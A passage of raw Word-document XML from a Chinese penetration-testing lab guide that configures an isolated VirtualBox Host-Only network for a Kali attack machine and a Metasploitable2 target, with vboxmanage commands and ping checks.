      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置，读者可按需选择。无论使用哪种方式，请在你自己的实验笔记中清晰记录每台虚拟机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，以便于还原实验状态②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络已创建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 列出所有 Host-Only 网络</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> list hostonlyifs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出应包含类似以下的信息（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;...&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为省略的细节）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GUID: &lt;...&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP: Disabled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enabled)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IPAddress: 192.168.56.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMask: 255.255.255.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IPV6Address:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IPV6NetworkMaskPrefixLength: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HardwareAddress: 0a:00:27:00:00:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MediumType: Ethernet</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: Up</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VBoxNetworkName: HostInterfaceNetworking-vboxnet0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: Up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IPAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与你设置的相匹配，即表示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络已就绪①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="步骤-2将虚拟机绑定到-host-only-网络"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2：将虚拟机绑定到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设你已有一个导入的虚拟机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux，具体导入步骤见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节），现在需将其网络适配器绑定到刚创建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作：修改虚拟机网络设置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 为名为 "Kali-Linux" 的虚拟机添加第二块网卡（第一块保持 NAT 不变）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 并将第二块网卡绑定到 vboxnet0 Host-Only 网络</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifyvm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Kali-Linux"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--nic2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostonly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--hostonlyadapter2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vboxnet0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2），我们通常将其唯一的网卡完全置于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络中，移除所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网卡：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 将虚拟机的第一块网卡设置为 Host-Only 模式，绑定到 vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 并断开任何 NAT 连接</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifyvm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Metasploitable2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--nic1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostonly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--hostonlyadapter1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 确保 NAT 引擎不连接</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifyvm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Metasploitable2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--nic2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> none</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[图形界面操作]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主窗口中选择虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">适配器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用网络连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接方式选择“Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Network” → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在“名称”下拉框中选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对于攻击机，适配器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="步骤-3验证隔离连通性与不可达性"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3：验证隔离——连通性与不可达性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机配置完成后，启动攻击机和靶机。在攻击机（Kali）的终端中，进行以下连通性验证。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">这是每次搭建完毕后必须执行的“冒烟测试”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，它直接验证隔离是否生效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1：攻击机与靶机能互通</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设你的靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②（可以通过在靶机上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取，DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动分配的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.101–254</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区间）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 在 Kali 终端中</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PING &lt;TARGET_IP&gt; (&lt;TARGET_IP&gt;) 56(84) bytes of data.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from &lt;TARGET_IP&gt;: icmp_seq=1 ttl=64 time=0.345 ms</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from &lt;TARGET_IP&gt;: icmp_seq=2 ttl=64 time=0.287 ms</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--- &lt;TARGET_IP&gt; ping statistics ---</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4 packets transmitted, 4 received, 0% packet loss, time 3055ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP Echo Reply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表明二层可达，Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟交换机正在正确转发帧。这也验证了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析正常工作（若读者对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理感兴趣，可回顾《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2：实验室网络与外网不通（核心隔离测试）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">隔离验证的关键步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——确保攻击流量不会泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
